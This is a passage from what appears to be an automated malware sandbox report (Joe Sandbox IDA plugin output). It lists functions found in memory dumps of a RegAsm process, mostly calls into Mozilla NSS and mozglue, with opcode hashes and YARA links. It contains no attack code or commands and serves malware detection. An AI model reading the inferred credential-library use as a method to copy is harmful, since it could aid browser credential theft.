                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Alloc_Util$Arena$Valuefreemalloc
                                                                                                        • String ID:
                                                                                                        • API String ID: 3768380896-0
                                                                                                        • Opcode ID: 978ad80e97002024bfec25537a748e28487697b6e2441b0a03de781c13e443df
                                                                                                        • Instruction ID: e36ef952bac84844d7f1cfd42d8b7db0971bf8a0238b8eb2255ca2c2a6127af3
                                                                                                        • Opcode Fuzzy Hash: 978ad80e97002024bfec25537a748e28487697b6e2441b0a03de781c13e443df
                                                                                                        • Instruction Fuzzy Hash: B5815AB5A0420A9FEB14CF55DC88AAB77F5AF88308F144428EE159BF51DB30E914CBA1
                                                                                                        Function 6C21CCF0 Relevance: 9.2, APIs: 6, Instructions: 171memorythreadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 6C21C6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C21DAE2,?), ref: 6C21C6C2
                                                                                                        • PR_Now.NSS3 ref: 6C21CD35
                                                                                                          • Part of subcall function 6C279DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C2C0A27), ref: 6C279DC6
                                                                                                          • Part of subcall function 6C279DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C2C0A27), ref: 6C279DD1
                                                                                                          • Part of subcall function 6C279DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C279DED
                                                                                                          • Part of subcall function 6C206C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C1B1C6F,00000000,00000004,?,?), ref: 6C206C3F
                                                                                                        • PR_GetCurrentThread.NSS3 ref: 6C21CD54
                                                                                                          • Part of subcall function 6C279BF0: TlsGetValue.KERNEL32(?,?,?,6C2C0A75), ref: 6C279C07
                                                                                                          • Part of subcall function 6C207260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C1B1CCC,00000000,00000000,?,?), ref: 6C20729F
                                                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C21CD9B
                                                                                                        • PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 6C21CE0B
                                                                                                        • PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6C21CE2C
                                                                                                          • Part of subcall function 6C2110C0: TlsGetValue.KERNEL32(?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C2110F3
                                                                                                          • Part of subcall function 6C2110C0: EnterCriticalSection.KERNEL32(?,?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C21110C
                                                                                                          • Part of subcall function 6C2110C0: PL_ArenaAllocate.NSS3(?,?,?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C211141
                                                                                                          • Part of subcall function 6C2110C0: PR_Unlock.NSS3(?,?,?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C211182
                                                                                                          • Part of subcall function 6C2110C0: TlsGetValue.KERNEL32(?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C21119C
                                                                                                        • PORT_ArenaMark_Util.NSS3(00000000), ref: 6C21CE40
                                                                                                          • Part of subcall function 6C2114C0: TlsGetValue.KERNEL32 ref: 6C2114E0
                                                                                                          • Part of subcall function 6C2114C0: EnterCriticalSection.KERNEL32 ref: 6C2114F5
                                                                                                          • Part of subcall function 6C2114C0: PR_Unlock.NSS3 ref: 6C21150D
                                                                                                          • Part of subcall function 6C21CEE0: PORT_ArenaMark_Util.NSS3(?,6C21CD93,?), ref: 6C21CEEE
                                                                                                          • Part of subcall function 6C21CEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C21CD93,?), ref: 6C21CEFC
                                                                                                          • Part of subcall function 6C21CEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C21CD93,?), ref: 6C21CF0B
                                                                                                          • Part of subcall function 6C21CEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C21CD93,?), ref: 6C21CF1D
                                                                                                          • Part of subcall function 6C21CEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C21CD93,?), ref: 6C21CF47
                                                                                                          • Part of subcall function 6C21CEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C21CD93,?), ref: 6C21CF67
                                                                                                          • Part of subcall function 6C21CEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,6C21CD93,?,?,?,?,?,?,?,?,?,?,?,6C21CD93,?), ref: 6C21CF78
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadUnothrow_t@std@@@Zfree__ehfuncinfo$??2@
                                                                                                        • String ID:
                                                                                                        • API String ID: 3748922049-0
                                                                                                        • Opcode ID: e19f6aab00ceaa32f64e9e3b752ae893e5c65ee7c9a66b570135dc3b18723e8c
                                                                                                        • Instruction ID: 6df6b054359b50ea5ae326c7fe3be7b583ef5360d0f05fb7bd489f70dc5be05b
                                                                                                        • Opcode Fuzzy Hash: e19f6aab00ceaa32f64e9e3b752ae893e5c65ee7c9a66b570135dc3b18723e8c
                                                                                                        • Instruction Fuzzy Hash: 2B51B3BAA0420D9BE710EF69DC40B9A77F4AF48748F250534EE5897F40EB31E945CB91
                                                                                                        Function 6C1EEEF0 Relevance: 9.1, APIs: 6, Instructions: 124threadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PK11_Authenticate.NSS3(?,00000001,00000004), ref: 6C1EEF38
                                                                                                          • Part of subcall function 6C1D9520: PK11_IsLoggedIn.NSS3(00000000,?,6C20379E,?,00000001,?), ref: 6C1D9542
                                                                                                        • PK11_Authenticate.NSS3(?,00000001,?), ref: 6C1EEF53
                                                                                                          • Part of subcall function 6C1F4C20: TlsGetValue.KERNEL32 ref: 6C1F4C4C
                                                                                                          • Part of subcall function 6C1F4C20: EnterCriticalSection.KERNEL32(?), ref: 6C1F4C60
                                                                                                          • Part of subcall function 6C1F4C20: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C1F4CA1
                                                                                                          • Part of subcall function 6C1F4C20: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C1F4CBE
                                                                                                          • Part of subcall function 6C1F4C20: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C1F4CD2
                                                                                                          • Part of subcall function 6C1F4C20: realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C1F4D3A
                                                                                                        • PR_GetCurrentThread.NSS3 ref: 6C1EEF9E
                                                                                                          • Part of subcall function 6C279BF0: TlsGetValue.KERNEL32(?,?,?,6C2C0A75), ref: 6C279C07
                                                                                                        • free.MOZGLUE(00000000), ref: 6C1EEFC3
                                                                                                        • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C1EF016
                                                                                                        • free.MOZGLUE(00000000), ref: 6C1EF022
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: K11_Value$AuthenticateCriticalEnterSectionfree$CurrentErrorLoggedThreadUnlockrealloc
                                                                                                        • String ID:
                                                                                                        • API String ID: 2459274275-0
                                                                                                        • Opcode ID: f81f7fadf1cea2f6c1a872380e030d306f9f48cf2013a2f9f9fa001f6d58d190
                                                                                                        • Instruction ID: 10823bc004edb419ce54dc7538fd74aed0d0531fb69d3dbd2fc68c6bf30de204
                                                                                                        • Opcode Fuzzy Hash: f81f7fadf1cea2f6c1a872380e030d306f9f48cf2013a2f9f9fa001f6d58d190
                                                                                                        • Instruction Fuzzy Hash: FB416271E00209ABDF019FA9EC85BEF7BBAEF48358F044029F914E6351E771D9158BA1
                                                                                                        Function 6C1C4860 Relevance: 9.1, APIs: 6, Instructions: 121COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SEC_QuickDERDecodeItem_Util.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C1C4894
                                                                                                          • Part of subcall function 6C20B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C2E18D0,?), ref: 6C20B095
                                                                                                        • SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C1C48CA
                                                                                                        • SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C1C48DD
                                                                                                        • SEC_QuickDERDecodeItem_Util.NSS3(00000000,?,?,?), ref: 6C1C48FF
                                                                                                        • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C1C4912
                                                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C1C494A
                                                                                                          • Part of subcall function 6C25C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C25C2BF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Util$AlgorithmTag_$DecodeErrorItem_Quick$Value
                                                                                                        • String ID:
                                                                                                        • API String ID: 759476665-0
                                                                                                        • Opcode ID: a867981633c240582411eb6c1255f23ada2d40ebf2acf5d0bb45896b5f40e5db
                                                                                                        • Instruction ID: a1b1683fa281e45232fa280413341db618dbc7d65c719839dd9a193f584c9f99
                                                                                                        • Opcode Fuzzy Hash: a867981633c240582411eb6c1255f23ada2d40ebf2acf5d0bb45896b5f40e5db
                                                                                                        • Instruction Fuzzy Hash: BA41CF70B08309ABE710CA69C881BAB73E89BA8708F00052DFE5597B41FB74E904CB53
                                                                                                        Function 6C1DCF40 Relevance: 9.1, APIs: 6, Instructions: 112memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PORT_Alloc_Util.NSS3(00000060), ref: 6C1DCF80
                                                                                                        • SECITEM_DupItem_Util.NSS3(?), ref: 6C1DD002
                                                                                                        • PR_SetError.NSS3(FFFFE005,00000000,00000000,00000000,?,00000000), ref: 6C1DD016
                                                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C1DD025
                                                                                                        • PR_NewLock.NSS3 ref: 6C1DD043
                                                                                                        • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C1DD074
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorUtil$Alloc_ContextDestroyItem_K11_Lock
                                                                                                        • String ID:
                                                                                                        • API String ID: 3361105336-0
                                                                                                        • Opcode ID: 310c7b25a9e2fd916d3f6c436316085698340b33a6cc01c2b885d2156097d0d4
                                                                                                        • Instruction ID: e483e1ae006df7b06de663fafd02efa15a02550c1b76446b5d33b488b77dcfab
                                                                                                        • Opcode Fuzzy Hash: 310c7b25a9e2fd916d3f6c436316085698340b33a6cc01c2b885d2156097d0d4
                                                                                                        • Instruction Fuzzy Hash: F341B4B0A013159FDB10EF29C8847977BE4EF58318F12416ADC198BB46D774E889CFA2
                                                                                                        Function 00413259 Relevance: 9.1, APIs: 6, Instructions: 110stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: strtok_s
                                                                                                        • String ID:
                                                                                                        • API String ID: 3330995566-0
                                                                                                        • Opcode ID: 264f35a48c595a1dd1d23ce806c08b0664bc3f9f1fea006674d365e83df1677c
                                                                                                        • Instruction ID: 735330a1d008a833b374886be4d947a81621c86a210c44f2da093846d2bcbd8c
                                                                                                        • Opcode Fuzzy Hash: 264f35a48c595a1dd1d23ce806c08b0664bc3f9f1fea006674d365e83df1677c
                                                                                                        • Instruction Fuzzy Hash: 64319671E001099FCB14DF68CC85BAA77A8BB08717F51505BEC05DA191EB7CCB818B4C
                                                                                                        Function 6C1C2E60 Relevance: 9.1, APIs: 6, Instructions: 105COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SECOID_FindOID_Util.NSS3(?,00000000,00000001,00000000,?,?,6C1B2D1A), ref: 6C1C2E7E
                                                                                                          • Part of subcall function 6C2107B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C1B8298,?,?,?,6C1AFCE5,?), ref: 6C2107BF
                                                                                                          • Part of subcall function 6C2107B0: PL_HashTableLookup.NSS3(?,?), ref: 6C2107E6
                                                                                                          • Part of subcall function 6C2107B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C21081B
                                                                                                          • Part of subcall function 6C2107B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C210825
                                                                                                        • PR_Now.NSS3 ref: 6C1C2EDF
                                                                                                        • CERT_FindCertIssuer.NSS3(?,00000000,?,0000000B), ref: 6C1C2EE9
                                                                                                        • SECOID_FindOID_Util.NSS3(-000000D8,?,?,?,?,6C1B2D1A), ref: 6C1C2F01
                                                                                                        • CERT_DestroyCertificate.NSS3(?,?,?,?,?,?,6C1B2D1A), ref: 6C1C2F50
                                                                                                        • SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6C1C2F81
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FindUtil$ErrorHashLookupTable$CertCertificateConstCopyDestroyIssuerItem_
                                                                                                        • String ID:
                                                                                                        • API String ID: 287051776-0
                                                                                                        • Opcode ID: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
                                                                                                        • Instruction ID: 3152add54283efefe95e402e6ac7d2479fdf1ff15fcc91707b3276571d02708e
                                                                                                        • Opcode Fuzzy Hash: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
                                                                                                        • Instruction Fuzzy Hash: 8031047170110C87F710C755CC58BAE7265EBB1318F2415BAF51997AD0EB3D9846CA23
                                                                                                        Function 6C0EDC50 Relevance: 9.1, APIs: 6, Instructions: 104timethreadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C0EDC60
                                                                                                        • AcquireSRWLockExclusive.KERNEL32(?,?,?,6C0ED38A,?), ref: 6C0EDC6F
                                                                                                        • free.MOZGLUE(?,?,?,?,?,6C0ED38A,?), ref: 6C0EDCC1
                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,6C0ED38A,?), ref: 6C0EDCE9
                                                                                                        • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,6C0ED38A,?), ref: 6C0EDD05
                                                                                                        • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000001,?,?,?,6C0ED38A,?), ref: 6C0EDD4A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325466692.000000006C091000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C090000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325445154.000000006C090000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3325754871.000000006C10D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3325812764.000000006C11E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3325838597.000000006C122000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c090000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ExclusiveLockStampTimeV01@@Value@mozilla@@$AcquireCurrentReleaseThreadfree
                                                                                                        • String ID:
                                                                                                        • API String ID: 1842996449-0
                                                                                                        • Opcode ID: 0a296b1b1d447204fa0fb58e993ef00f50bcc3a56b150bcbf6548171cfc98683
                                                                                                        • Instruction ID: 19be5b338249fcbe362f0519654cfbf58646e35ccd3b257c91ac1b990798edb8
                                                                                                        • Opcode Fuzzy Hash: 0a296b1b1d447204fa0fb58e993ef00f50bcc3a56b150bcbf6548171cfc98683
                                                                                                        • Instruction Fuzzy Hash: AA4115B5A006168FCB44CF99C880A9AB7F6FF8D314B5545A9D945ABB11D771FC00CB90
                                                                                                        Function 6C1B0E00 Relevance: 9.1, APIs: 6, Instructions: 101memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CERT_DecodeAVAValue.NSS3(?,?,6C1B0A2C), ref: 6C1B0E0F
                                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,6C1B0A2C), ref: 6C1B0E73
                                                                                                        • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,6C1B0A2C), ref: 6C1B0E85
                                                                                                        • PORT_ZAlloc_Util.NSS3(00000001,?,?,6C1B0A2C), ref: 6C1B0E90
                                                                                                        • free.MOZGLUE(00000000), ref: 6C1B0EC4
                                                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,6C1B0A2C), ref: 6C1B0ED9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Util$Alloc_$ArenaDecodeItem_ValueZfreefreememset
                                                                                                        • String ID:
                                                                                                        • API String ID: 3618544408-0
                                                                                                        • Opcode ID: 100d66f4cb82d364386c414d2ef172eeacc1277c04a019fcc4216eb95d7bd809
                                                                                                        • Instruction ID: 09dfeabc746a108e2147a77a7ecd2db09eccd73ee88ae89798dd2ad1340a1de3
                                                                                                        • Opcode Fuzzy Hash: 100d66f4cb82d364386c414d2ef172eeacc1277c04a019fcc4216eb95d7bd809
                                                                                                        • Instruction Fuzzy Hash: F92170F3F002884BEB0045699E41B6B72AEDFD1748F0A0035FD1877A12FB75C8158AA2
                                                                                                        Function 6C1C88D0 Relevance: 9.1, APIs: 6, Instructions: 97memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C1D0725,00000000,00000058), ref: 6C1C8906
                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C1C891A
                                                                                                        • PL_ArenaAllocate.NSS3(?,?), ref: 6C1C894A
                                                                                                        • calloc.MOZGLUE(00000001,6C1D072D,00000000,00000000,00000000,?,6C1D0725,00000000,00000058), ref: 6C1C8959
                                                                                                        • memset.VCRUNTIME140(?,00000000,?), ref: 6C1C8993
                                                                                                        • PR_Unlock.NSS3(?), ref: 6C1C89AF
                                                                                                          • Part of subcall function 6C1A07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C13204A), ref: 6C1A07AD
                                                                                                          • Part of subcall function 6C1A07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C13204A), ref: 6C1A07CD
                                                                                                          • Part of subcall function 6C1A07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C13204A), ref: 6C1A07D6
                                                                                                          • Part of subcall function 6C1A07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C13204A), ref: 6C1A07E4
                                                                                                          • Part of subcall function 6C1A07A0: TlsSetValue.KERNEL32(00000000,?,6C13204A), ref: 6C1A0864
                                                                                                          • Part of subcall function 6C1A07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C1A0880
                                                                                                          • Part of subcall function 6C1A07A0: TlsSetValue.KERNEL32(00000000,?,?,6C13204A), ref: 6C1A08CB
                                                                                                          • Part of subcall function 6C1A07A0: TlsGetValue.KERNEL32(?,?,6C13204A), ref: 6C1A08D7
                                                                                                          • Part of subcall function 6C1A07A0: TlsGetValue.KERNEL32(?,?,6C13204A), ref: 6C1A08FB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Value$calloc$AllocateArenaCriticalEnterSectionUnlockmemset
                                                                                                        • String ID:
                                                                                                        • API String ID: 1716546843-0
                                                                                                        • Opcode ID: c0a2d47303506a098c73ede6b0130096f790bb86944b41c58ea86dea837a96b9
                                                                                                        • Instruction ID: 4ec4895bddf5721b8b9f8d5fbea2b07e2f7fdfc17c7fb5553925a70e62c244d5
                                                                                                        • Opcode Fuzzy Hash: c0a2d47303506a098c73ede6b0130096f790bb86944b41c58ea86dea837a96b9
                                                                                                        • Instruction Fuzzy Hash: 4131F572B00215ABE7009F28CC81A5AB7A8AF65318F15822AFC1C97B41E735E855C7E3
                                                                                                        Function 6C1BAE50 Relevance: 9.1, APIs: 6, Instructions: 85COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PORT_NewArena_Util.NSS3(00000800), ref: 6C1BAEB3
                                                                                                        • SEC_ASN1EncodeUnsignedInteger_Util.NSS3(00000000,?,00000000), ref: 6C1BAECA
                                                                                                        • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C1BAEDD
                                                                                                        • PR_SetError.NSS3(FFFFE022,00000000), ref: 6C1BAF02
                                                                                                        • SEC_ASN1EncodeItem_Util.NSS3(?,?,?,6C2D9500), ref: 6C1BAF23
                                                                                                          • Part of subcall function 6C20F080: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6C20F0C8
                                                                                                          • Part of subcall function 6C20F080: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C20F122
